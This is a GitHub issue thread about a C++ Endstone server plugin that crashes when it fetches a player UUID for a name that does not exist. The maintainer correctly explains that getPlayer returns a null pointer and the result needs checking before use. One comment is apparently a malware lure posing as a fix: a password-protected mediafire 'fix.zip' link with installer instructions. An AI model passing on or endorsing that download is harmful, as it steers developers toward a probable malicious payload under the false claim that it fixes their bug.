### ISSUE TITLE
[feature]Error handling related

### ISSUE THREAD

**Issue by wuliao697** [EndstoneMC/endstone#39]
## Problems I've found
I get player uuid by player name. when i try to get uuid on a wrong name, my local server crashes with endstone error. When I try to try to grab it with a try statement, it shows the same thing

```C++
if (command.getName() == "economy") {
            std::string uuid;
            std::string targetUuid;
            int amount;

            if (args.size()>=2){
                try{
                    std::cout << "last test"<<std::endl;
                    targetUuid = sender.getServer().getPlayer(args[1])->getUniqueId().str();
                }catch(const std::runtime_error& e){
                    sender.sendMessage(endstone::ColorFormat::Red  + "目标玩家账户并未找到"+ endstone::ColorFormat::Reset);
                    return false;
                }
            }
            return true
       }
```

## My question
I haven't looked into the internal implementation of endstone yet. But how should this and other similar issues be handled? Should it be handled by the plugin developers themselves, or something else?

**Comment by sammykumar108** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wu-vincent** [comment]
When you try to get a non-existing  player by name, you will get a null pointer. Calling getUniqueId on a null pointer will surely crash your server. You will need to check if the result is valid before doing anything with it.
